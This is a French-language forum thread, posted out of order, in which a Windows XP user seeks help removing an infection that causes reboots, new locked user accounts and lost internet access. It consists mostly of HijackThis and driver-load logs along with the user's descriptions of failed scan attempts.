/install O4 - HKLM\..\Run: [NvMediaCenter] RUNDLL32.EXE C:\WINDOWS\system32\NvMcTray.dll,NvTaskbarInit O4 - HKLM\..\Run: [LVCOMSX] C:\WINDOWS\system32\LVCOMSX.EXE O4 - HKLM\..\Run: [LogitechVideoRepair] C:\Program Files\Logitech\Video\ISStart.exe O4 - HKLM\..\Run: [TkBellExe] "C:\Program Files\Fichiers communs\Real\Update_OB\realsched.exe" -osboot O4 - HKLM\..\Run: [EPSON Stylus DX4800 Series] C:\WINDOWS\System32\spool\DRIVERS\W32X86\3\E_FATIADE.EXE /P26 "EPSON Stylus DX4800 Series" /O6 "USB001" /M "Stylus DX4800" O4 - HKLM\..\Run: [sunJavaUpdateSched] "C:\Program Files\Java\jre1.5.0_11\bin\jusched.exe" O4 - HKLM\..\Run: [kav] "C:\Program Files\AOL\Active Virus Shield\avp.exe" O4 - HKLM\..\Run: [LogitechVideoTray] C:\Program Files\Logitech\Video\LogiTray.exe O4 - HKLM\..\Run: [Firewall] C:\WINDOWS\Navnet.exe O4 - HKLM\..\Run: [!AVG Anti-Spyware] "C:\Program Files\Grisoft\AVG Anti-Spyware 7.5\avgas.exe" /minimized O4 - HKLM\..\RunServices: [Firewall] C:\WINDOWS\Navnet.exe O4 - HKCU\..\Run: [H/PC Connection Agent] "C:\Program Files\Microsoft ActiveSync\Wcescomm.exe" O4 - HKCU\..\Run: [EPSON Stylus DX4800 Series] C:\WINDOWS\System32\spool\DRIVERS\W32X86\3\E_FATIADE.EXE /P26 "EPSON Stylus DX4800 Series" /M "Stylus DX4800" /EF "HKCU" O4 - HKCU\..\Run: [CD_Updater] C:\Program Files\Carpe Diem\video-complete\CDUpdater.exe CD_UPDATER O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe O4 - Global Startup: Adobe Reader Speed Launch.lnk = C:\Program Files\Adobe\Acrobat 7.0\Reader\reader_sl.exe O4 - Global Startup: Rappels du Calendrier Microsoft Works.lnk = ? O4 - Global Startup: Utilitaire réseau pour SAGEM Wi-Fi 11g USB adapter.lnk = ? O7 - HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System, DisableRegedit=1 O8 - Extra context menu item: E&xporter vers Microsoft Excel - res://C:\PROGRA~1\MI1933~1\OFFICE11\EXCEL.EXE/3000 O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.5.0_11\bin\ssv.dll O9 - Extra 'Tools' menuitem: Console Java (Sun) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.5.0_11\bin\ssv.dll O9 - Extra button: Create Mobile Favorite - {2EAF5BB1-070F-11D3-9307-00C04FAE2D4F} - C:\PROGRA~1\MI3AA1~1\INetRepl.dll O9 - Extra button: (no name) - {2EAF5BB2-070F-11D3-9307-00C04FAE2D4F} - C:\PROGRA~1\MI3AA1~1\INetRepl.dll O9 - Extra 'Tools' menuitem: Créer un Favori de l'appareil mobile... - {2EAF5BB2-070F-11D3-9307-00C04FAE2D4F} - C:\PROGRA~1\MI3AA1~1\INetRepl.dll O9 - Extra button: Recherche - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MI1933~1\OFFICE11\REFIEBAR.DLL O9 - Extra button: Organise-notes - {9455301C-CF6B-11D3-A266-00C04F689C50} - C:\Program Files\Fichiers communs\Microsoft Shared\Reference 2001\EROProj.dll O9 - Extra button: (no name) - {e2e2dd38-d088-4134-82b7-f2ba38496583} - %windir%\Network Diagnostic\xpnetdiag.exe (file missing) O9 - Extra 'Tools' menuitem: @xpsp3res.dll,-20001 - {e2e2dd38-d088-4134-82b7-f2ba38496583} - %windir%\Network Diagnostic\xpnetdiag.exe (file missing) O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe O11 - Options group: [iNTERNATIONAL] International* O17 - HKLM\System\CCS\Services\Tcpip\..\{65F5B42C-EB4D-4C06-89D1-99BED72D9AE8}: NameServer = 208.67.222.222,208.67.220.220 O17 - HKLM\System\CCS\Services\Tcpip\..\{CC5EE862-3E1A-4215-8035-F2EB6C7BF8F2}: NameServer = 208.67.222.222,208.67.220.220 O18 - Protocol: msnim - {828030A1-22C1-4009-854F-8E305202313F} - "C:\PROGRA~1\MSNMES~1\msgrapp.dll" (file missing) O20 - Winlogon Notify: klogon - C:\WINDOWS\system32\klogon.dll O20 - Winlogon Notify: WgaLogon - C:\WINDOWS\SYSTEM32\WgaLogon.dll O21 - SSODL: WPDShServiceObj - {AAA288BA-9A4C-45B0-95D7-94D524869DB5} - C:\WINDOWS\system32\WPDShServiceObj.dll O23 - Service: AVG Anti-Spyware Guard - Anti-Malware Development a.s. - C:\Program Files\Grisoft\AVG Anti-Spyware 7.5\guard.exe O23 - Service: Active Virus Shield (AVP) - Unknown owner - C:\Program Files\AOL\Active Virus Shield\avp.exe" -r (file missing) O23 - Service: NVIDIA Display Driver Service (NVSvc) - NVIDIA Corporation - C:\WINDOWS\system32\nvsvc32.exe O23 - Service: Pml Driver HPZ12 - HP - C:\WINDOWS\system32\HPZipm12.exe Pour ce qui est de la connexion internet, une fenêtre s'ouvre me demandant la clef wep mais le temps que je la saisisse le micro s'était relancé. dois-je refaire une tentative ou directement essayé ton indication avec "Menu Démarrer / exectuer et tape : netsh winsock reset" Encore merci de ton attention et de ton aide...

Heu........ Je peux pas faire de scan en ligne !!! Je n'arrive pas a me connecter avec le pc infecté Pour nos discussion j'utilise mon pc portable Heu........ Je peux pas faire de scan en ligne !!! Je n'arrive pas a me connecter avec le pc infecté Pour nos discussions j'utilise mon pc portable

Voilà qui est fait : Service Pack 2 5 12 2007 15:39:55.500 Pilote charg‚ \WINDOWS\system32\ntoskrnl.exe Pilote charg‚ \WINDOWS\system32\hal.dll Pilote charg‚ \WINDOWS\system32\KDCOM.DLL Pilote charg‚ \WINDOWS\system32\BOOTVID.dll Pilote charg‚ ACPI.sys Pilote charg‚ \WINDOWS\System32\DRIVERS\WMILIB.SYS Pilote charg‚ pci.sys Pilote charg‚ isapnp.sys Pilote charg‚ ohci1394.sys Pilote charg‚ \WINDOWS\System32\DRIVERS\1394BUS.SYS Pilote charg‚ intelide.sys Pilote charg‚ \WINDOWS\System32\DRIVERS\PCIIDEX.SYS Pilote charg‚ MountMgr.sys Pilote charg‚ ftdisk.sys Pilote charg‚ PartMgr.sys Pilote charg‚ VolSnap.sys Pilote charg‚ atapi.sys Pilote charg‚ disk.sys Pilote charg‚ \WINDOWS\System32\DRIVERS\CLASSPNP.SYS Pilote charg‚ fltmgr.sys Pilote charg‚ sr.sys Pilote charg‚ KSecDD.sys Pilote charg‚ WudfPf.sys Pilote charg‚ Ntfs.sys Pilote charg‚ NDIS.sys Pilote charg‚ Mup.sys Pilote charg‚ kl1.sys Pilote charg‚ \WINDOWS\system32\drivers\TDI.SYS Pilote charg‚ agp440.sys Pilote charg‚ \SystemRoot\System32\DRIVERS\nic1394.sys Pilote charg‚ \SystemRoot\System32\DRIVERS\processr.sys Pilote charg‚ \SystemRoot\system32\DRIVERS\nv4_mini.sys Pilote charg‚ \SystemRoot\System32\DRIVERS\RTL8139.SYS Pilote charg‚ \SystemRoot\system32\drivers\cmaudio.sys Pilote charg‚ \SystemRoot\System32\DRIVERS\cdrom.sys Pilote charg‚ \SystemRoot\System32\DRIVERS\redbook.sys Pilote charg‚ \SystemRoot\system32\DRIVERS\imapi.sys Pilote charg‚ \SystemRoot\System32\DRIVERS\usbuhci.sys Pilote charg‚ \SystemRoot\System32\DRIVERS\fdc.sys Pilote charg‚ \SystemRoot\System32\DRIVERS\serial.sys Pilote charg‚ \SystemRoot\System32\DRIVERS\serenum.sys Pilote charg‚ \SystemRoot\System32\DRIVERS\parport.sys Pilote charg‚ \SystemRoot\System32\DRIVERS\i8042prt.sys Pilote charg‚ \SystemRoot\System32\DRIVERS\mouclass.sys Pilote charg‚ \SystemRoot\System32\DRIVERS\kbdclass.sys Pilote charg‚ \SystemRoot\System32\DRIVERS\gameenum.sys Pilote charg‚ \SystemRoot\system32\drivers\msmpu401.sys Pilote charg‚ \SystemRoot\System32\DRIVERS\audstub.sys Pilote charg‚ \SystemRoot\System32\DRIVERS\rasl2tp.sys Pilote charg‚ \SystemRoot\System32\DRIVERS\ndistapi.sys Pilote charg‚ \SystemRoot\System32\DRIVERS\ndiswan.sys Pilote charg‚ \SystemRoot\System32\DRIVERS\raspppoe.sys Pilote charg‚ \SystemRoot\System32\DRIVERS\raspptp.sys Pilote charg‚ \SystemRoot\System32\DRIVERS\msgpc.sys Pilote charg‚ \SystemRoot\System32\DRIVERS\psched.sys Pilote charg‚ \SystemRoot\System32\DRIVERS\ptilink.sys Pilote charg‚ \SystemRoot\System32\DRIVERS\raspti.sys Pilote charg‚ \SystemRoot\System32\DRIVERS\termdd.sys Pilote charg‚ \SystemRoot\System32\DRIVERS\swenum.sys Pilote charg‚ \SystemRoot\System32\DRIVERS\update.sys Pilote charg‚ \SystemRoot\System32\DRIVERS\mssmbios.sys Pilote charg‚ \SystemRoot\System32\Drivers\NDProxy.SYS Le pilote n'a pas ‚t‚ charg‚ \SystemRoot\System32\Drivers\NDProxy.SYS Pilote charg‚ \SystemRoot\System32\DRIVERS\usbhub.sys Pilote charg‚ \SystemRoot\System32\DRIVERS\flpydisk.sys Le pilote n'a pas ‚t‚ charg‚ \SystemRoot\System32\Drivers\lbrtfdc.SYS Le pilote n'a pas ‚t‚ charg‚ \SystemRoot\System32\Drivers\Sfloppy.SYS Le pilote n'a pas ‚t‚ charg‚ \SystemRoot\System32\Drivers\i2omgmt.SYS Le pilote n'a pas ‚t‚ charg‚ \SystemRoot\System32\Drivers\Changer.SYS Le pilote n'a pas ‚t‚ charg‚ \SystemRoot\System32\Drivers\Cdaudio.SYS Pilote charg‚ \SystemRoot\System32\Drivers\Fs_Rec.SYS Pilote charg‚ \SystemRoot\System32\Drivers\Null.SYS Pilote charg‚ \SystemRoot\System32\Drivers\Beep.SYS Pilote charg‚ \SystemRoot\System32\DRIVERS\AvgAsCln.sys Pilote charg‚ \SystemRoot\System32\drivers\vga.sys Pilote charg‚ \SystemRoot\System32\Drivers\mnmdd.SYS Pilote charg‚ \SystemRoot\System32\DRIVERS\RDPCDD.sys Pilote charg‚ \SystemRoot\System32\Drivers\Msfs.SYS Pilote charg‚ \SystemRoot\System32\Drivers\Npfs.SYS Pilote charg‚ \SystemRoot\System32\DRIVERS\rasacd.sys Pilote charg‚ \SystemRoot\System32\DRIVERS\ipsec.sys Pilote charg‚ \SystemRoot\System32\DRIVERS\tcpip.sys Pilote charg‚ \SystemRoot\System32\DRIVERS\netbt.sys Pilote charg‚ \SystemRoot\System32\drivers\afd.sys Pilote charg‚ \SystemRoot\System32\DRIVERS\netbios.sys Le pilote n'a pas ‚t‚ charg‚ \SystemRoot\System32\Drivers\PCIDump.SYS Pilote charg‚ \SystemRoot\System32\DRIVERS\rdbss.sys Pilote charg‚ \SystemRoot\System32\DRIVERS\mrxsmb.sys Pilote charg‚ \??\C:\WINDOWS\system32\drivers\klif.sys Pilote charg‚ \SystemRoot\System32\DRIVERS\ipnat.sys Pilote charg‚ \SystemRoot\System32\DRIVERS\wanarp.sys Pilote charg‚ \SystemRoot\System32\DRIVERS\arp1394.sys Pilote charg‚ \SystemRoot\System32\Drivers\Fips.SYS Pilote charg‚ \SystemRoot\system32\DRIVERS\usbccgp.sys Pilote charg‚ \??\C:\Program Files\Fichiers communs\Symantec Shared\EENGINE\eeCtrl.sys Pilote charg‚ \??\C:\Program Files\Grisoft\AVG Anti-Spyware 7.5\guard.sys Pilote charg‚ \SystemRoot\system32\DRIVERS\WlanBZXP.sys Pilote charg‚ \SystemRoot\system32\DRIVERS\CamDrL21.sys Pilote charg‚ \SystemRoot\system32\drivers\usbaudio.sys Pilote charg‚ \SystemRoot\System32\Drivers\Fastfat.SYS Le pilote n'a pas ‚t‚ charg‚ \SystemRoot\System32\Drivers\adildr.sys Pilote charg‚ \SystemRoot\system32\DRIVERS\nwlnkipx.sys Pilote charg‚ \SystemRoot\system32\DRIVERS\nwlnknb.sys Pilote charg‚ \SystemRoot\System32\DRIVERS\ndisuio.sys Le pilote n'a pas ‚t‚ charg‚ \SystemRoot\System32\DRIVERS\rdbss.sys Le pilote n'a pas ‚t‚ charg‚ \SystemRoot\System32\DRIVERS\mrxsmb.sys Pilote charg‚ \SystemRoot\System32\DRIVERS\mrxdav.sys Pilote charg‚ \SystemRoot\System32\Drivers\ParVdm.SYS Le pilote n'a pas ‚t‚ charg‚ \SystemRoot\System32\Drivers\Ca533av.sys Pilote charg‚ \SystemRoot\system32\DRIVERS\nwlnkspx.sys Pilote charg‚ \SystemRoot\System32\DRIVERS\srv.sys Pilote charg‚ \SystemRoot\System32\DRIVERS\secdrv.sys Pilote charg‚ \SystemRoot\system32\drivers\wdmaud.sys Pilote charg‚ \SystemRoot\system32\drivers\sysaudio.sys Pilote charg‚ \SystemRoot\system32\drivers\splitter.sys Pilote charg‚ \SystemRoot\system32\drivers\aec.sys Pilote charg‚ \SystemRoot\system32\drivers\swmidi.sys Pilote charg‚ \SystemRoot\system32\drivers\DMusic.sys Pilote charg‚ \SystemRoot\system32\drivers\kmixer.sys Pilote charg‚ \SystemRoot\system32\drivers\drmkaud.sys Le pilote n'a pas ‚t‚ charg‚ \SystemRoot\System32\DRIVERS\ipnat.sys Pilote charg‚ \SystemRoot\System32\Drivers\Cdfs.SYS Pilote charg‚ \SystemRoot\System32\Drivers\HTTP.sys Pilote charg‚ \SystemRoot\System32\DRIVERS\USBSTOR.SYS Pilote charg‚ \SystemRoot\system32\drivers\kmixer.sys J'espère que ça te causera plus qu'à moi !!!!

Bon, c'est ce que je craignais, Je ne peux pas faire un scan avec DiagHelp. L'ordinateur redemarre avant la fin !!!

Bonjour Malekal morte Et merci de ton attention Juste une petite question avant de commencer le combat avec la machine, Est-ce que je peux suivre tes indications en mode sans echec ? Car sinon, je n'aurais absolument pas le temps de faire un scan....

Bonjour à toutes et à tous, J'ai un PC fonctionnant sous Windows XP et utilisant IE. Antivirus : Active Virus Shield Antispyware : AVG antispyware + Ad Aware Se + Ccleaner. Hier, sans crier garde, mon pc s'est éteind puis s'est rallumé tout seul. Il a créé deux comptes utilisateurs (Nommés ADSL et nombre). Ceux-ci sont protégés par mot de passe. Je ne suis plus administrateur de mon PC. Toutefois j'ai toujours accès à ma session. Cependant, je ne peux plus me connecter à internet. Et, enfin, ma session s'arrête au bout de deux à trois minutes car l'ordinateur redémarre. J'ai lancé, en mode sans échec, des scans avec mon antivirus, AVG antispyware, Ccleaner et même MRT. Mis a part quelques coockies, rien a été trouvé. J'ai donc installé Hijackthis, à l'aide d'une clé usb et voici le rapport : Logfile of HijackThis v1.99.1 Scan saved at 12:34:39, on 12/05/2007 Platform: Windows XP SP2 (WinNT 5.01.2600) MSIE: Internet Explorer v7.00 (7.00.6000.16441) Running processes: C:\WINDOWS\System32\smss.exe C:\WINDOWS\system32\winlogon.exe C:\WINDOWS\system32\services.exe C:\WINDOWS\system32\lsass.exe C:\WINDOWS\system32\svchost.exe C:\WINDOWS\System32\svchost.exe C:\WINDOWS\system32\svchost.exe C:\WINDOWS\system32\spoolsv.exe C:\Program Files\Grisoft\AVG Anti-Spyware 7.5\guard.exe C:\Program Files\AOL\Active Virus Shield\avp.exe C:\WINDOWS\system32\nvsvc32.exe C:\WINDOWS\System32\svchost.exe C:\WINDOWS\system32\MsPMSPSv.exe C:\Program Files\QuickTime\qttask.exe C:\WINDOWS\Mixer.exe C:\WINDOWS\system32\LVCOMSX.EXE C:\Program Files\Fichiers communs\Real\Update_OB\realsched.exe C:\WINDOWS\System32\spool\DRIVERS\W32X86\3\E_FATIADE.EXE C:\Program Files\Java\jre1.5.0_11\bin\jusched.exe C:\Program Files\AOL\Active Virus Shield\avp.exe C:\Program Files\Logitech\Video\LogiTray.exe C:\WINDOWS\system32\cmd.exe C:\Program Files\Grisoft\AVG Anti-Spyware 7.5\avgas.exe C:\Program Files\Logitech\Video\FxSvr2.exe C:\WINDOWS\explorer.exe C:\WINDOWS\system32\ping.exe C:\Program Files\Hijackthis Version Française\hijackthis vf.exe R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://webmail.dbmail.com/webmail/fr_FR/lo...ml?LOGIN1=panow R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69157 R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896 R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896 R1 - HKCU\Software\Microsoft\Internet Connection Wizard,ShellNext = http://register.libertysurf.com/dispatch/d...MKTG=PFMPFRPAB7 R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings,ProxyOverride = localhost R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName = Liens O2 - BHO: Adobe PDF Reader Link Helper - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 7.0\ActiveX\AcroIEHelper.dll O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.5.0_11\bin\ssv.dll O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files\QuickTime\qttask.exe" -atboottime O4 - HKLM\..\Run: [NvCplDaemon] RUNDLL32.EXE C:\WINDOWS\system32\NvCpl.dll,NvStartup O4 - HKLM\..\Run: [C-Media Mixer] Mixer.exe /startup O4 - HKLM\..\Run: [WorksFUD] C:\Program Files\Microsoft Works\wkfud.exe O4 - HKLM\..\Run: [Microsoft Works Portfolio] C:\Program Files\Microsoft Works\WksSb.exe /AllUsers O4 - HKLM\..\Run: [Microsoft Works Update Detection] C:\Program Files\Microsoft Works\WkDetect.exe O4 - HKLM\..\Run: [MSPluginSrvc] p3.exe O4 - HKLM\..\Run: [NeroFilterCheck] C:\WINDOWS\system32\NeroCheck.exe O4 - HKLM\..\Run: [nwiz] nwiz.exe /install O4 - HKLM\..\Run: [NvMediaCenter] RUNDLL32.EXE C:\WINDOWS\system32\NvMcTray.dll,NvTaskbarInit O4 - HKLM\..\Run: [LVCOMSX] C:\WINDOWS\system32\LVCOMSX.EXE O4 - HKLM\..\Run: [LogitechVideoRepair] C:\Program Files\Logitech\Video\ISStart.exe O4 - HKLM\..\Run: [TkBellExe] "C:\Program Files\Fichiers communs\Real\Update_OB\realsched.exe" -osboot O4 - HKLM\..\Run: [EPSON Stylus DX4800 Series] C:\WINDOWS\System32\spool\DRIVERS\W32X86\3\E_FATIADE.EXE /P26 "EPSON Stylus DX4800 Series" /O6 "USB001" /M "Stylus DX4800" O4 - HKLM\..\Run: [sunJavaUpdateSched] "C:\Program Files\Java\jre1.5.0_11\bin\jusched.exe" O4 - HKLM\..\Run: [kav] "C:\Program Files\AOL\Active Virus Shield\avp.exe" O4 - HKLM\..\Run: [rgnepuvwco] c:\windows\system32\rgnepuvwco.exe rgnepuvwco O4 - HKLM\..\Run: [LogitechVideoTray] C:\Program Files\Logitech\Video\LogiTray.exe O4 - HKLM\..\Run: [Firewall] C:\WINDOWS\Navnet.exe O4 - HKLM\..\Run: [!AVG Anti-Spyware] "C:\Program Files\Grisoft\AVG Anti-Spyware 7.5\avgas.exe" /minimized O4 - HKLM\..\RunServices: [MSPluginSrvc] p3.exe O4 - HKLM\..\RunServices: [Firewall] C:\WINDOWS\Navnet.exe O4 - HKCU\..\Run: [MSPluginSrvc] p3.exe O4 - HKCU\..\Run: [H/PC Connection Agent] "C:\Program Files\Microsoft ActiveSync\Wcescomm.exe" O4 - HKCU\..\Run: [EPSON Stylus DX4800 Series] C:\WINDOWS\System32\spool\DRIVERS\W32X86\3\E_FATIADE.EXE /P26 "EPSON Stylus DX4800 Series" /M "Stylus DX4800" /EF "HKCU" O4 - HKCU\..\Run: [CD_Updater] C:\Program Files\Carpe Diem\video-complete\CDUpdater.exe CD_UPDATER O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe O4 - Global Startup: Adobe Reader Speed Launch.lnk = C:\Program Files\Adobe\Acrobat 7.0\Reader\reader_sl.exe O4 - Global Startup: Rappels du Calendrier Microsoft Works.lnk = ? O4 - Global Startup: Utilitaire réseau pour SAGEM Wi-Fi 11g USB adapter.lnk = ? O7 - HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System, DisableRegedit=1 O8 - Extra context menu item: E&xporter vers Microsoft Excel - res://C:\PROGRA~1\MI1933~1\OFFICE11\EXCEL.EXE/3000 O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.5.0_11\bin\ssv.dll O9 - Extra 'Tools' menuitem: Console Java (Sun) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.5.0_11\bin\ssv.dll O9 - Extra button: Create Mobile Favorite - {2EAF5BB1-070F-11D3-9307-00C04FAE2D4F} - C:\PROGRA~1\MI3AA1~1\INetRepl.dll O9 - Extra button: (no name) - {2EAF5BB2-070F-11D3-9307-00C04FAE2D4F} - C:\PROGRA~1\MI3AA1~1\INetRepl.dll O9 - Extra 'Tools' menuitem: Créer un Favori de l'appareil mobile... - {2EAF5BB2-070F-11D3-9307-00C04FAE2D4F} - C:\PROGRA~1\MI3AA1~1\INetRepl.dll O9 - Extra button: Recherche - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MI1933~1\OFFICE11\REFIEBAR.DLL O9 - Extra button: Organise-notes - {9455301C-CF6B-11D3-A266-00C04F689C50} - C:\Program Files\Fichiers communs\Microsoft Shared\Reference 2001\EROProj.dll O9 - Extra button: (no name) - {e2e2dd38-d088-4134-82b7-f2ba38496583} - %windir%\Network Diagnostic\xpnetdiag.exe (file missing) O9 - Extra 'Tools' menuitem: @xpsp3res.dll,-20001 - {e2e2dd38-d088-4134-82b7-f2ba38496583} - %windir%\Network Diagnostic\xpnetdiag.exe (file missing) O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe O11 - Options group: [iNTERNATIONAL] International* O17 - HKLM\System\CCS\Services\Tcpip\..\{65F5B42C-EB4D-4C06-89D1-99BED72D9AE8}: NameServer = 208.67.222.222,208.67.220.220 O17 - HKLM\System\CCS\Services\Tcpip\..\{CC5EE862-3E1A-4215-8035-F2EB6C7BF8F2}: NameServer = 208.67.222.222,208.67.220.220 O18 - Protocol: msnim - {828030A1-22C1-4009-854F-8E305202313F} - "C:\PROGRA~1\MSNMES~1\msgrapp.dll" (file missing) O20 - Winlogon Notify: klogon - C:\WINDOWS\system32\klogon.dll O20 - Winlogon Notify: WgaLogon - C:\WINDOWS\SYSTEM32\WgaLogon.dll O21 - SSODL: WPDShServiceObj - {AAA288BA-9A4C-45B0-95D7-94D524869DB5} - C:\WINDOWS\system32\WPDShServiceObj.dll O23 - Service: AVG Anti-Spyware Guard - Anti-Malware Development a.s. - C:\Program Files\Grisoft\AVG Anti-Spyware 7.5\guard.exe O23 - Service: Active Virus Shield (AVP) - Unknown owner - C:\Program Files\AOL\Active Virus Shield\avp.exe" -r (file missing) O23 - Service: NVIDIA Display Driver Service (NVSvc) - NVIDIA Corporation - C:\WINDOWS\system32\nvsvc32.exe O23 - Service: Pml Driver HPZ12 - HP - C:\WINDOWS\system32\HPZipm12.exe Merci de m'apporter votre aide et vos lumières...